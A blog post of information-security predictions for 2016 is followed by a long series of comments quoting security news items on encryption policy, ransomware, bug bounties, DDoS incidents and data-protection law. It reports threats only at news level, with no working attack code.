Here are my predictions for trends in information security and cyber security for year 2016.
Year 2015 was bad for information security was pretty, and I would say that the trend is worrying. So I expect the year 2016 will have many information security challenges. If you want to keep yourself up at night, spend some time reading about the latest developments in cybersecurity. In 2015 there was Airplanes hacked, cars hacked, vulnerabilities in a breathtaking range of sensitive equipment from TSA locks to voting booths to medical devices. The big picture is even scarier. Former NSA Director Mike McConnell suspects China has hacked “every major corporation” in the US. Those problems will continue in 2016 and some new targets for attacks will be found. The system is broken. It isn’t keeping us, our companies, or our government safe. Worse yet, no one seems to know how to fix it.
Attacks through networks are becoming more common all the time. It will be hard to protect against targeted attacks. Hackers will not only customize malware, but they will increasingly use sophisticated phishing and social engineering tricks to gain access to sensitive data. Attackers usually cover their tracks carefully, and in the identification of target can be very difficult. Behind targeted attacks are usually professional criminals. Criminals do not respect geographical borders and hence attacks are spread evenly everywhere. Companies will struggle to absorb the security threats of combined PC and mobile devices in 2016.
EU information security decisions made in late 2015 will have impact on what comes in 2016: New EU data protection legislation package approved and EU Court of Justice decision in which it noted the Safe Harbor procedure is invalid. This means that transfers of personal data from EU countries to the United States under the Safe Harbor violation of law – you need some other agreement for this. The situation for this will probably get clarified during 2016. Data protection legislation changes will lead to increased fines for the unprepared. Legal uncertainty and big fines are a toxic cocktail for some companies. The combination of stiff penalties and ambiguously worded provisions in the new EU-wide data-protection law, which would replace a patchwork of 28 national laws, raises daunting prospects for companies operating in Europe.
After huge amount of user information leaks in 2015 from all kinds of Internet services, there will the challenges for cloud companies to gain trust in their security. You might have just dared to trust “the right cloud services,” since in principle the traditional information security point of view, they seem to be the main things okay, rising this privacy issues raised.
New environments will bring new threats. New operating systems versions means that administrators and users are less familiar with the environments. IPv6 will get more widely used, and the security of IPv6 networks is different from IPv4. Organizations are moving to virtualized environments, which are complex and create network layers that can become an attack vector. Growing network virtualization functionality and programmability are both an opportunity and a threat to security. Cyber security research will be important important in 2016 as 5G networks will be critical infrastructure, on top of which for example. transport, industry, health and the new operators set up their business around 2020.
The huge amount of information security information is becoming harder and harder to manage in 2016. A key problem in revelations as all other news coverage is the exponential growth of knowledge. There are variety of news summaries produced a daily basis, but they are not enough to get good picture of what is happening. There are bigger and smaller news, the impact of which is at times very difficult to assess. SMBs will become a bigger target for cybercriminals. Network and security professionals continue to be among the toughest IT talent to find and hire.
Old way network security focused on perimeter defense is not enough in 2016. Old mantras “encrypt everything” and “secure the perimeter,” are not enough. One deceptive truth seems to drive much of the cybersecurity industry down a rabbit hole: If you keep bad actors and bad software out of your system, you have nothing to worry about. It does not work like that anymore. As perimeter security gets stronger, malicious actors are looking for easier entry points to compromise an organisation through the breadth of its digital attack surface. Now malicious actors target “endpoints”—any device or sensor connected to a network—to break into that network. Traditional sandboxing will no longer protect against the growing malware landscape. Today, most private networks have far too many endpoints to properly secure. In an age of “Bring Your Own Device,” the cloud, remote access, and the Internet of Things, there are too many vulnerabilities hackers can exploit. Keep in mind that everything connected to the Internet can, and will be hacked. To address those threats in 2016, security experts should assume compromise – that hackers and malware already have breached their defenses, or soon will – and instead classify and mitigate threats. In addition to public key infrastructure lock-and-key system you will need also an integrity solution that acts like an alarm. To protect against advanced threats, security professionals will increase their reliance on centralized security management solutions. You need to have prioritization and response plans to various kinds of breaches – with a strong focus on integrity.
Law enforcement versus Silicon Valley tension will continue to be strong throughout year 2016. In 2015 Law enforcement and politicians on both sides of the Atlantic lined up to repeatedly complain that the web was “going dark” as the result of end-to-end encryption and that this was hampering the investigation of terrorism and other serious crimes.Technologists and cryptographers argue that governments are trying to weaken encryption by demanding some form of privileged access for government. It’s not clear how much encryption the NSA can break. With renewed focus on how encrypted messages can be used to plot terrorist attacks, President Barack Obama’s administration is stepping up pressure on the tech sector to help in the battle. Privacy remains a major counter-argument. It seems that Governments Lie About Encryption Backdoors. Encryption systems weakened by mandated backdoors would not be effective in fighting the terrorists that governments invoke as their reason for wanting those backdoors in the first place.
But this does not stop some government officials to demand such thing with varying success on different countries. Another fact is that The existence of coded communications is a reality and the U.S. may not be able to do much about it because nearly everyone living in modern society uses it: Encryption protects your bank information, prevents your password from being stolen when you log into a website, and allows all e-commerce transactions to take place securely. Encryption weakened by mandated backdoors would put all of us at an enormous risk of exposure from data breaches and associated online risks. The truth in 2016 is that any form of privileged access to government – ie, a backdoor – would inevitably weaken crypto-systems and make them more vulnerable to attacks by foreign governments’ intelligence agencies as well as criminals - Juniper’s VPN security hole is proof that govt backdoors are bonkers. Encryption backdoors would be a gleeful win-win for terrorists and a horrific lose-lose for you – the bad guys having strong protections for their data, and the rest of us not. The poorly thought-out and crude surveillance technique could have a devastating effect on the country’s internet security- as for example Kazakhstan will force its citizens to install internet backdoors by requiring all Internet users install state-issued root certificate by January 1, 2016.
Google, Mozilla and Microsoft are pushing for early SHA-1 crypto cutoff that can happen in 2016 instead of earlier planned Jan 1st, 2017. Due to recent research showing that SHA-1 is weaker than previously believed, because it’s been cracked without enormous effort. Mozilla, Microsoft and now Google are all considering bringing the deadline forward by six months to July 1, 2016. SHA-2 is going to be used as the replacement function for SHA-1. Websites like Facebook and those protected by CloudFlare have implemented a SHA-1 fallback mechanism for those systems that do not support SHA-2. Chrome will start display errors if SHA-1 certificates are employed in early 2016 and will completely stop supporting SHA-1 certificates in the end of 2016.
The use of Blockchain technology, permissionless distributed database based on the bitcoin protocol that runs across a global network of independent computers, will get used more widely than for just Bitcoin virtual money. With bitcoin, Blockchain tracks the exchange of money. But it can also track the exchange of anything else that holds value, including stocks, bonds, and other financial securities. Overstock has already used the blockchain to issue private bonds. The Securities and Exchange Commission has approved a plan from online retailer Overstock.com to issue company stock via the Internet, signaling a significant shift in the way financial securities will be distributed and traded in the years to come. Overstock built its technology under the aegis of a subsidiary called TØ.com, and it plans to offer this “cryptosecurity” tech as a service to other businesses. Nasdaq OMX—the company behind the Nasdaq stock exchange—is using the blockchain to oversee the exchange of private stock. Also several major companies from across both the technology and financial industries—including IBM, Intel, and Cisco as well as the London Stock Exchange Group and big-name banks JP Morgan, Wells Fargo, and State Street—have joined forces to create an alternative to the blockchain with Linux Foundation.
The use of disk encryption will increase and there are different ways to do it with different security levels. Microsoft has introduced Windows 10 disk encryption keys are uploaded to Microsoft. This approach has some advantages and disadvantages. The gold standard in disk encryption is end-to-end encryption, where only you can unlock your disk. This is what most companies use, and it seems to work well. It protects data in case your device is lost or stolen. But what if you forget or loose your key? There are certainly cases where it’s helpful to have a backup of your key or password – so keeping a backup of your recovery key in your Microsoft account could be genuinely useful for probably the majority of users that don’t have high security neeeds. The disadvantage of this approach is that Your computer is now only as secure as that database of keys held by Microsoft, which means it may be vulnerable to hackers, foreign governments, and people who can extort Microsoft employees.
Weak leaking passwords are still huge security problem still in 2016. Passwords are often the weakest parts when it comes to securing users’ accounts, as many don’t use complex passwords or they reuse the same password across services. Two-factor authentication – like using a USB stick with a secret token or entering in a code sent via text method to your phone – can help to increase security, but many users also find this to be a hassle as it introduces an additional step to the login process.
Google begins testing login system that uses phone notifications for authentication instead of passwords: authenticate by responding to a notification sent to their smartphone. The idea is similar to Yahoo’s recently launched “Account Key,” which also offers a password-free means of signing in involving a push notification sent to your phone that then opens an app where you approve the log-in.
Smart phone will become more and more security critical part of your life. “Increasingly, individuals and organisations are adopting password managers and multi-factor authentication technologies to plug some of the holes in password-based authentication. “We foresee a world where practically everyone uses their smartphone as a multi-factor authentication element. In this world, the smartphone becomes your most valuable asset: something that enables you to unlock your life online and a target for attackers seeking to access your services.”
Expect that number of mobile vulnerabilities will only grow in 2016. In 2016 we will see increasing numbers of cyber criminals using mobile applications to spread malware. Mobile presents an easy target for cyber criminals, because it is an attack surface that is open and extremely difficult to defend once an app has been released. Android threats will become more than just headline-grabbers. Will 2016 be the year iOS malware goes mainstream?
Critical infrastructures will be highly targeted in 2015. SCADA and ICS networks were not designed for security. Attacks against these systems have increased in recent years. I expect this trend to only get worse. There are still many companies that run their critical systems on Windows XP as “There are some people who don’t have an option to change.” Many times the OS is running in automation and process control systems that run business and mission-critical systems, both in private sector and government enterprises. For example US Navy is using obsolete operating system Microsoft Windows XP to run critical tasks. It all comes down to money and resources, but if someone is obliged to keep something running on an obsolete system, it’s the wrong approach to information security completely.
Cars were hacked at record rate in 2015, and they will be hacked at least at the same rate in 2016. Modern cars are featuring more gadgetry and connected systems, and this will make vehicles just as vulnerable to today’s threats and attacks. I Am The Cavalry has published a five star Cyber Safety Framework to mitigate this threat in cars, hopefully car component makers study it.
IoT and smart devices are still at risk. The Internet of Things will continue to emerge, and businesses will need to think about how to protect their smart devices and prepare for the wider adoption of IoT. IoT platforms – not yet the weapon of choice for commercial malware authors – but business beware. Wearables won’t be safe, either, as they are built using largerly same too often vulnerable technologies as other IoT system. IoT security is still in in infancy in 2016.
Cyber criminals have become more active in 2015 particularly in the malicious the ransom fabrications. The ransom-malware problem will continue to be big in 2016. Commercial malware authors will continue to invest heavily and Exploit kits will continue to dominate on the web. Ransomware today is big business. Ransomware takes control of a computer and holds it hostage until the victim pays, usually in the digital currency Bitcoin. As a remedy against ransom-malware I recommend to ensure IT Support or your service provider the data back-up and restoring procedure operational, practiced and tested. You can need it in 2016 to get your data back without considering paying to criminals. To date ransomware has hit Windows users hardest, although Android and MacOS users are now also facing similar extortion.
Ransomware will continue to dominate in 2016 and it is only a question of time before we see things beyond data being ransomed. We have already seen websites being held ransom to DDoS. Intel’s McAfee Labs also noted a huge spike in ransomware in early 2015, and worries about ransomware in the IoT space—including medical devices. And Kaspersky predicts the “nightmare of ransomware” to continue and “spread to new frontiers” in 2016. Ransomware Is Coming to Medical Devices article tells that according to a report released recently week by Forrester Research the number one cybersecurity prediction for 2016: “We’ll see ransomware for a medical device or wearable.” “It’s definitely feasible from a technical standpoint”. Networked medical devices save lives. Despite the hacking risk, it’s an informed trade-off. Medical device ransomware would be a modern form of highway robbery with lives at stake.
Keep in mind that everything connected to the Internet can, and will be hacked. In 2016 If You’re Not Paranoid, You’re Crazy. As government agencies and tech companies develop more and more intrusive means of watching and influencing people, how can we live free lives? Unfortunately I don’t have solution for that.
2,232 Comments
Tomi Engdahl says:
Barry Abrahamson / WordPress.com News:
WordPress.com enables HTTPS with Let’s Encrypt for new hosted sites with custom domains, will soon expand support to 1M+ sites currently using custom domains
HTTPS Everywhere: Encryption for All WordPress.com Sites
https://en.blog.wordpress.com/2016/04/08/https-everywhere-encryption-for-all-wordpress-com-sites/
We’re proud to support a more secure web — now for all custom domains on WordPress.com.
Today we are excited to announce free HTTPS for all custom domains hosted on WordPress.com. This brings the security and performance of modern encryption to every blog and website we host.
Best of all, the changes are automatic — you won’t need to do a thing.
As the EFF points out as part of their Encrypt the Web initiative, strong encryption protects our users in various ways, including defending against surveillance of content and communications, cookie theft, account hijacking, and other web security flaws.
Tomi Engdahl says:
Apple Aftermath: Senate Entertains A New Encryption Bill
http://hackaday.com/2016/04/11/apple-aftermath-senate-entertains-a-new-encryption-bill/
There are dozens of services (backup comes to mind) where only you have the decryption keys and there is nothing reasonable the provider can do to get your data if you lose your keys. That’s actually a selling point for their service. You might not be anxious to backup your hard drive if you knew the vendor could browse your data when they wanted to do so.
The proposed bill has some other issues, too. One section states that nothing in the document is meant to require or prohibit a specific design or operating system. However, another clause requires that covered entities provide products and services that are capable of complying with the rule.
A broad reading of this is troubling. If this were law, entire systems that don’t allow the provider or vendor to decrypt your data could be illegal in the U. S.
Whole classes of cybersecurity techniques could become illegal, too. For example, many cryptography systems use the property of forward secrecy by generating unrecorded session keys. For example, consider an SSH session. If someone learns your SSH key, they can listen in or interfere with your SSH sessions. However, they can’t take recordings of your previous sessions and decode them. The mechanism is a little different between SSHv1 (which you shouldn’t be using) and SSHv2. If you are interested in the gory details for SSHv2, have a look at section 9.3.7 of RFC 4251.
Tomi Engdahl says:
Hack The Pentagon, Legally
http://hackaday.com/2016/04/11/hack-the-pentagon-legally/
The United States Department of Defense just launched the world’s first government-funded bug bounty program named HackThePentagon. Following the example of Facebook, Google, and other big US companies, the DoD finally provides “a legal avenue for the responsible disclosure of security vulnerabilities”.
Hack the Pentagon
The first U.S. Government commercial bug bounty program.
https://hackerone.com/hackthepentagon
Thank you for your interest in participating in HackerOne’s Department of Defense (DoD) “Hack the Pentagon” pilot–the first ever U.S. Government commercial Bug Bounty program. This is an effort for the Government to explore new approaches to its cybersecurity challenges, and evolve to adopt the best practices used by the most successful and secure software companies in the world, the DoD can ensure U.S. systems and warfighters are as secure as possible.
The Hack the Pentagon Bug Bounty Pilot will start on Monday, April 18, 2016 and end on Thursday, May 12, 2016.
Tomi Engdahl says:
The Swedish newspaper Dagens Nyheter says today that the army servers was used for DDoS-attacks on American banks’ online services in 2013. The large banks went bust services, often for several days.
It is normal denial of service attack. Servers massive amounts of page load requests for services sent to American banks. Traffic got the crash site. Exceptional is the fact that the Swedish army servers was used as a tool.
According to Dagens Nyheter, Sweden’s military security servers had long been weak on security.
The army learned of the abduction of their servers only when the MSB Authority (Myndigheten samhällsskydd och för Beredskap) informs that matter. According to the army, it was human error.
Dagens Nyheter further reveals that the situation is very bad, even today, as there are very many servers outside army with similar vulnerabilities around Sweden.
Source: http://etn.fi/index.php?option=com_content&view=article&id=4244:ruotsin-armeijan-palvelimilta-hyokattiin-pankkeihin&catid=13&Itemid=101
Tomi Engdahl says:
Sweden Military Servers Hacked, Used in 2013 Attack on US Banks
http://www.securityweek.com/sweden-military-servers-hacked-used-2013-attack-us-banks
Swedish military computers were hacked and used in an attack targeting major US banks in 2013, the armed forces said on Monday.
The attack knocked out the web pages of as many as 20 major US banks and financial institutions, sometimes for several days.
Speaking to AFP, military spokesman Mikael Abramsson said that a server in the Swedish defense system had a flaw which was exploited by hackers to carry out the attacks, confirming a report in the Swedish daily DN.
Servers Hacked for DDoS
“The hacking attack was a kind of wake-up call for us and forced us to take very specific security steps to prevent such a thing from happening again,”
The servers were used in a so-called DDoS attack (distributed denial of service)
At the time, the attack, which began in 2012 and continued for months, was one of the biggest ever reported.
US officials blamed Iran
DDoS attacks have long been a basic hacker weapon but they have typically involved the use of armies of personal computers tainted with viruses and coordinated to make simultaneous requests at targeted websites.
Tomi Engdahl says:
3 Steps to Thriving in One of Cybersecurity’s 1 Million Open Positions
http://www.securityweek.com/3-steps-thriving-one-cybersecuritys-1-million-open-positions
Cisco’s John Stewart believes there are roughly a million security role vacancies, and this gap is now officially a crisis. We are about a million brains and bodies short of what we need to plug the many growing holes that perforate our highly internetworked environments. Complicating this are legions of posers, intentional and uninformed, feeding off the payrolls of organizations desperate to hire anyone, anyone, who understands what AV, OWASP, or CISSP mean.
Here is a simple three-step process to be the security professional companies are looking for:
Step One: Research the Reasons for the Role
Typically, a new security opening in a company means that something happened. By the time a real job is posted or a recruiter is engaged, there has been some catalyzing event. The first step to getting that job is to research why they’ve decided to post it in the first place.
Step Two: Develop a comprehensible approach
The companies who have the most interesting jobs with the broadest scope will likely not know very much about the details of security. Helping them understand why you are a great choice first requires that you educate them on what it is you do.
Step 3: Start with a call and targeted questions
You now are knowledgeable on the company, the team, and you have an idea of the problems they may be looking to solve. Finish the picture by establishing yourself as an exceptional candidate, with a call. When you speak with the recruiter or HR executive, ask to follow-up with someone who works there. This gives you the chance to refine your approach and test your assumptions.
The Results?
If you do this kind of homework, you will not only be better prepared, but also a better candidate. You will also have a head start as you look at any other opportunities in that same industry.
Tomi Engdahl says:
Malware Changes Router DNS Settings via Mobile Devices
http://www.securityweek.com/malware-changes-router-dns-settings-mobile-devices
Researchers have come across a piece of JavaScript malware that is capable of changing the DNS settings of home routers from mobile devices.
The malware, dubbed by Trend Micro JS_JITON, has been distributed via compromised websites in Russia and various Asian countries. When these compromised sites are visited from a mobile device, JS_JITON is delivered and it downloads a threat detected as JS_JITONDNS, which is designed to change the DNS settings of the router the infected device is connected to.
According to Trend Micro, the campaign started in December 2015 and has mainly affected users in Taiwan (27%), Japan (19%), China (12%), the United States (8%) and France (4%). Infections have also been spotted in Canada, Australia, Korea, Hong Kong, the Netherlands and other countries.
Tomi Engdahl says:
Malware Found in IoT Cameras Sold by Amazon
http://www.securityweek.com/malware-found-iot-cameras-sold-amazon
Time was when you could trust big names. Not any more – in fact ‘big names’ are increasingly targeted by the bad guys simply because we do tend to trust them. Amazon is just the latest.
Mike Olsen, co-founder of Proctorio warned Saturday that a set of security cameras he had purchased from Amazon had been infected with malware. Connecting them to a friend’s computer he didn’t quite find what he expected – they were working, but not in the way he expected.
He thought it was a bug and used developer tools to look at the code. What he found, however, was not a simple bug, an iframe linking to a website that aroused suspicions: brenz_pl/rc/.
“Users,” confirmed Morten Kjaersgaard, CEO at Heimdal Security, “need to be aware that malware can be present in any form of device they buy.
“At the moment, fast moving consumer electronics are especially exposed. But we also saw this with Lenovo laptops and malware which was pre-installed. Cybercriminals will try to use trusted channels to get access to what they want.”
Tomi Engdahl says:
Lateral Movement: When Cyber Attacks Go Sideways
http://www.securityweek.com/lateral-movement-when-cyber-attacks-go-sideways
Lateral Movement Gives Attackers Additional Points of Control in a Compromised Network
Finding and stopping cyber attacks has become a key priority for everyone from the C-suite all the way to the frontline security and network administrator. Organizations are learning the hard way that preventative controls will never be 100% perfect, and today’s security teams are increasingly judged on their ability to keep a network intrusion from turning into data loss.
As a result, the ability to quickly and reliably detect lateral movement in the network is one of the most important emerging skills in information security today. Lateral movement refers to the various techniques attackers use to progressively spread through a network as they search for key assets and data.
In many ways, the lateral movement attack phase represents the biggest difference between today’s strategic, targeted attacks and the simplistic smash-and-grab attacks of the past. Let’s take a deeper look at lateral movement and how to use this information in your daily security practice.
Tomi Engdahl says:
Threat Modeling
http://www.omg.org/hot-topics/threat-modeling.htm
Threats and risks are increasingly multi-dimensional in nature – spanning both physical and cyber space across multiple domains, (i.e. critical infrastructure, cyber, health and human services, public safety).
There is a critical need to share threat and risk information across these domains. A community of interest (COI) with standards can help spearhead the integration of threat & risk management and situational awareness along with the standards, technologies and capabilities to counter multi-dimensional threats.
Threat information sharing enables system engineers and architects to build systems-of-systems that implement and leverage the capabilities to share threats (and potentially actual attacks) across different organizations, IT systems and standards. To enable threat sharing across different protocol platforms and systems, a platform-independent model of threats is needed for establishing a common understanding.
The Object Management Group® (OMG®) System Assurance Task Force in collaboration with the Government Domain Task Force has issued a Request for Proposal (RFP) for a Unified Modeling Language (UML®) Threat & Risk Model.
Threat and Risk Community
http://threatrisk.org/drupal/
Threats and risks are increasingly multi-dimensional in nature – spanning both physical and cyber space. Only by analyzing, federating, and sharing information across multiple domains (i.e. critical infrastructure, cyber, health and human services, public safety), can we effectively counter multi-dimensional threats. This community initiative is focused on driving the federation and secure sharing of threat, risk and provenance information across multiple domains, technologies and data formats. Domains of interest include but are not limited to cybersecurity, law enforcement and public safety, counter terrorism, critical infrastructure, health and emergency management.
Tomi Engdahl says:
Julia Fioretti / Reuters:
Microsoft offers first major endorsement of new EU-U.S. data pact — Microsoft (MSFT.O) became on Monday the first major U.S. tech company to say it would transfer users’ information to the United States using a new transatlantic commercial data pact and would resolve any disputes with European privacy watchdogs.
Microsoft offers first major endorsement of new EU-U.S. data pact
http://www.reuters.com/article/us-microsoft-dataprotection-eu-idUSKCN0X81IN
icrosoft (MSFT.O) became on Monday the first major U.S. tech company to say it would transfer users’ information to the United States using a new transatlantic commercial data pact and would resolve any disputes with European privacy watchdogs.
Data transfers to the United States have been conducted in a legal limbo since October last year when the European Union’s top court struck down the Safe Harbour framework that allowed firms to easily move personal data across the Atlantic in compliance with strict EU data transferral rules.
EU data protection law bars companies from transferring personal data to countries deemed to have insufficient privacy safeguards, of which the United States is one, unless they set up complex legal structures or use a framework like Safe Harbour.
Microsoft said it would sign up to the EU-U.S. Privacy Shield, the new framework that was agreed by Brussels and Washington in February to fill the void left by Safe Harbour and ensure the $260 billion in digital services trade across the Atlantic continues smoothly.
Tomi Engdahl says:
Facebook kills the password, in favor of new login tools in Account Kit
Soon, developers will be able to see what their users do for a living
http://www.pcworld.com/article/3055011/application-development/facebook-helps-developers-with-new-analytics-and-login-tools.html
Facebook is giving developers a host of new tools designed to help them better access and engage users, including improved analytics and new ways to log in to apps.
One of the biggest new developer tools the company announced at its F8 conference in San Francisco Tuesday was Account Kit, designed to let developers easily create login pages that accept a user’s email address, phone number, or Facebook login. That way, people using a mobile app that’s built with Account Kit can sign up for an account just by punching in their phone number, and authenticating with codes sent to them via text message.
Facebook does all of the heavy lifting for developers on Account Kit’s back end, so they don’t have to worry about setting up a system to take in phone numbers, Facebook logins, or anything else.
The company partnered with Indian music streaming app Saavn to test Account Kit, and the app received more than 500,000 sign-ups through just phone numbers over two months.
Tomi Engdahl says:
63 Percent of Healthcare IT Security Professionals Experienced a Data Breach, 96 Percent Feel Vulnerable
http://www.eetimes.com/prnewswire.asp?rkey=20160413SF70165&filter=4732
Continued Focus on Compliance Ahead of Data Breach Prevention
2016 Vormetric Data Threat Report – Healthcare Edition
Key findings:
96 percent feel vulnerable to data threats
63 percent have experienced a past data breach, with nearly one in five indicating a breach in the last year
At 61 percent, meeting compliance requirements was the top IT security spending priority, with preventing data breaches well behind at 40 percent
Complexity at 54 percent and lack of staff at 38 percent are identified as top barriers to adoption of better data security
Bright spots include 60 percent increasing spending to offset threats to data and 46 percent increasing spending on data-at-rest defenses this year
Healthcare data has become a prime target for cybercriminals. With records selling for hundreds of dollars, it’s no wonder healthcare professionals feel they are in a cybercriminal’s crosshairs. When asked about concerns with external threat actors, 72 percent chose cybercriminals as a top three selection, 39 percent as the number one selection.
Compliance continues to drive healthcare organizations – But compliance is not enough
top three reasons to secure sensitive data were:
Compliance (61 percent)
Reputation and brand (49 percent)
Implementing security best practices (46 percent)
The problem? 69 percent of U.S. healthcare respondents view meeting compliance requirements as a ‘very’ or ‘extremely’ effective way to protect sensitive data, yet slow moving compliance standards consistently fail to stop today’s multi-phase attacks.
Tomi Engdahl says:
The laptop camera you should cover
According to Sophos, criminals use Trojans capture RAT (remote acces trojan) computers and spy on their users. They can also launch the webcam image
What is a standard user then can be done? Sophos advised not new, but they should still be followed.
Laptop webcam you should cover them with tape when not in use. The operating system and its applications should be kept up to date at all times when security and other updates will be available. with opening the e-mail links you should be careful, even if they appear to come from the familiar.
Source: http://etn.fi/index.php?option=com_content&view=article&id=4253:taman-takia-lapparin-kamera-kannattaa-peittaa&catid=13&Itemid=101
Tomi Engdahl says:
Jigsaw Ransomware Deletes Your Files If You Don’t Pay Or When You Reboot Your PC
https://yro.slashdot.org/story/16/04/12/2140221/jigsaw-ransomware-deletes-your-files-if-you-dont-pay-or-when-you-reboot-your-pc
Researchers found a new ransomware yesterday called Jigsaw which will first lock your files and ask for a 0.4 Bitcoin ($150 USD) payment. If users don’t pay, every hour the ransomware deletes your files. If the user restarts their PC, the ransomware also deletes 1,000 more files. The good news is there’s a free Decrypter available to unlock the ransomware.
Jigsaw Ransomware Threatens to Delete Your Files, Free Decrypter Available
http://news.softpedia.com/news/jigsaw-ransomware-threatens-to-delete-your-files-free-decrypter-available-502824.shtml
A new ransomware variant called Jigsaw has come to light today, and it threatens and then deletes the user’s files if the ransom note is not paid in due time, or when the victim reboots their computer.
The way this ransomware reaches infected computers is currently unknown. What is known is that once the ransomware’s payload is launched into execution, it will target 226 different file types, encrypting their content with an AES algorithm and appending the .fun extension at the end of each file name.
Tomi Engdahl says:
Cybercriminals Are Adopting Corporate Best Practices
https://news.slashdot.org/story/16/04/12/1925213/cybercriminals-are-adopting-corporate-best-practices
Cybercriminals are adopting corporate best practices and establishing professional businesses in order to increase the efficiency of their attacks against enterprises and consumers. This new class of professional cybercriminal spans the entire ecosystem of attackers, extending the reach of enterprise and consumer threats and fueling the growth of online crime. Low-level criminal attackers are even creating call center operations to increase the impact of their scams.
Cybercriminals are adopting corporate best practices
https://www.helpnetsecurity.com/2016/04/12/professional-attack-groups/
Cybercriminals are adopting corporate best practices and establishing professional businesses in order to increase the efficiency of their attacks against enterprises and consumers. This new class of professional cybercriminal spans the entire ecosystem of attackers, extending the reach of enterprise and consumer threats and fueling the growth of online crime.
Tomi Engdahl says:
Security researcher to IBM: ‘Fix that 2013 Java bug’
And this time, do it right
http://www.theregister.co.uk/2016/04/13/security_researcher_to_ibm_fix_that_2013_java_bug/
A security researcher that pointed out serious Java Runtime Engine vulnerabilities to IBM in 2013 has accused Big Blue of not fixing the bugs properly.
The gist of this Full Disclosure post is that back in 2013, IBM closed off the proof-of-concept attack without considering all possible code paths to the vulnerability.
The message comes from Adam Gowdiak, who is credited with finding the flaw by IBM in this Security Bulletin.
Gowdiak’s new work explains that CVE-2013-5456 enabled a Java sandbox bypass.
IBM’s response at the time as to restrict access to classes from the com.ib.rmi.io package, which closed the scenario disclosed in November 2013.
Tomi Engdahl says:
SQL injection vuln found at Panama Papers firm Mossack Fonseca
Grey hat hacker continues probing scandal-hit lawyers
http://www.theregister.co.uk/2016/04/11/hackers_pwn_mossack_fonseca/
Grey hat security researchers have discovered new flaws in the systems of Panama leak firm Mossack Fonseca.
A self-styled “underground researcher” claims to have found a SQL injection flaw on one of the corporate systems of the Panamanian lawyers.
“They updated the new payment CMS, but forgot to lock the directory /onion/,” he said via the “1×0123” Twitter profile.
“It looks like MF [Mossack Fonseca] had really very low security level, [such] that hackers continue to hack them for fun,” a security intelligence source who notified us of the claimed vulnerability told El Reg.
Tomi Engdahl says:
Microsoft rated 6 of 13 security updates as critical, Badlock bug fix rated important
http://www.networkworld.com/article/3054645/security/microsoft-rated-6-of-13-security-updates-as-critical-badlock-bug-fix-rated-important.html
Microsoft released 13 security updates, including patches for zero-days. The patch for the Badlock bug is among those rated only as important.
For April 2016 Patch Tuesday, Microsoft released 13 security bulletins, with six being rated as critical for remote code execution flaws and the patch for Badlock being among those rated only as important.
Microsoft Security Bulletin Summary for April 2016
https://technet.microsoft.com/library/security/ms16-apr
Tomi Engdahl says:
Germany train crash: Controller ‘distracted by computer game’
http://www.bbc.com/news/world-europe-36025951
A German train controller has been arrested over the February rail crash that killed 11 people in Bavaria, as prosecutors suspect he was distracted by a computer game at the time.
According to prosecutors he was playing the computer game on his mobile phone and made a signalling error, then dialled the wrong emergency number.
He has admitted that version of events, German media report.
Two commuter trains collided on a single-track stretch near Bad Aibling.
Eighty-five passengers suffered injuries, some of them life-threatening.
Investigators quoted by German media said the timings of the computer game and the crash pointed to “the accused having been distracted from his management of rail traffic at the junction”.
The stretch of line had an automatic signalling system designed to halt any train that passed a stop signal.
But reports in German media suggested that the system had been switched off to let the eastbound train, which was running late, go past.
Tomi Engdahl says:
Wall Street Journal:
Twitter struggles to delete ISIS accounts, removing 26K suspected accounts in March while ISIS supporters created 21K
Twitter and Islamic State Deadlock on Social Media Battlefield
http://www.wsj.com/article_email/twitter-and-islamic-state-deadlock-on-social-media-battlefield-1460557045-lMyQjAxMTA2NDE0MzAxMzMwWj
The terror group’s online footprint has shrunk in crackdown aided by global hackers, but supporters open new accounts almost as quickly as digital gatekeepers delete them.
Tomi Engdahl says:
Jeremy B. White / Sacramento Bee:
California bill banning sale of phones with unbreakable encryption defeated in committee — California phone decryption bill defeated — Bill would penalize companies for not cooperating with law enforcement — Follows federal clash with FBI over San Bernardino shooter’s phone
California phone decryption bill defeated
http://www.sacbee.com/news/politics-government/capitol-alert/article71446037.html
A national debate over smartphone encryption arrived in Sacramento on Tuesday as legislators defeated a bill penalizing companies that don’t work with courts to break into phones, siding with technology industry representatives who called the bill a dangerous affront to privacy.
The bill did not receive a vote, with members of the Assembly Committee on Privacy and Consumer Protection worrying the measure would undermine data security and impose a logistically untenable requirement on California companies.
Disagreement over the balance between privacy and public safety exploded into public view in recent months when the FBI demanded that Apple unlock the phone of San Bernardino massacre perpetrator Syed Farook.
Read more here: http://www.sacbee.com/news/politics-government/capitol-alert/article71446037.html#storylink=cpy
Tomi Engdahl says:
Senate Intel panel releases official encryption bill draft
http://thehill.com/policy/cybersecurity/276181-senate-intel-panel-releases-official-encryption-bill-draft
A draft of the long-awaited Senate Intelligence Committee encryption bill officially arrived on Wednesday.
The measure, from Chairman Richard Burr (R-N.C.) and ranking member Dianne Feinstein (D-Calif.), would force companies to provide “technical assistance” to government investigators seeking locked data.
The move is a response to concerns that criminals are increasingly using encrypted technology to hide from authorities.
While law enforcement has long pressed Congress for legislation that would give it greater access to encrypted data, the tech community and privacy advocates warn it would undermine security and endanger online privacy.
“I have long believed that data is too insecure, and feel strongly that consumers have a right to seek solutions that protect their information — which involves strong encryption,” Burr said in a statement. “I do not believe, however, that those solutions should be above the law.”
“Terrorists and criminals are increasingly using encryption to foil law enforcement efforts, even in the face of a court order,” Feinstein said in a statement. “We need strong encryption to protect personal data, but we also need to know when terrorists are plotting to kill Americans.”
The bill does not include specific penalties for companies that refuse to help. Instead, the bill would leave it up to individual judges to decide how to penalize companies
Tomi Engdahl says:
Sarah Jeong / Motherboard:
Matthew Keys sentenced to 24 months under the Computer Fraud and Abuse Act for his role in 2010 LA Times hack, must surrender to custody June 15, plans appeal — Former Reuters Journalist Matthew Keys Sentenced to Two Years for Hacking — This story has been updated throughout with further information from the sentencing.
Former Reuters Journalist Matthew Keys Sentenced to Two Years for Hacking
http://motherboard.vice.com/read/former-reuters-journalist-matthew-keys-sentenced-to-two-years-for-hacking
On Wednesday, the former Reuters journalist Matthew Keys was sentenced to two years in prison for computer hacking.
Keys, who once worked for Tribune Company-owned Sacramento television station Fox 40, left that job in 2010 and went on to copy and paste login credentials for the Tribune Company’s content management system (CMS) into a chatroom where members of the hacking collective Anonymous planned out their operations. (Keys still denies all allegations.)
An unknown person under the username “sharpie” then went on to log into the CMS and deface a Los Angeles Times article. The article’s headline and dek (the subtitle beneath the headline) remained defaced for about forty minutes before an editor noticed and changed it back.
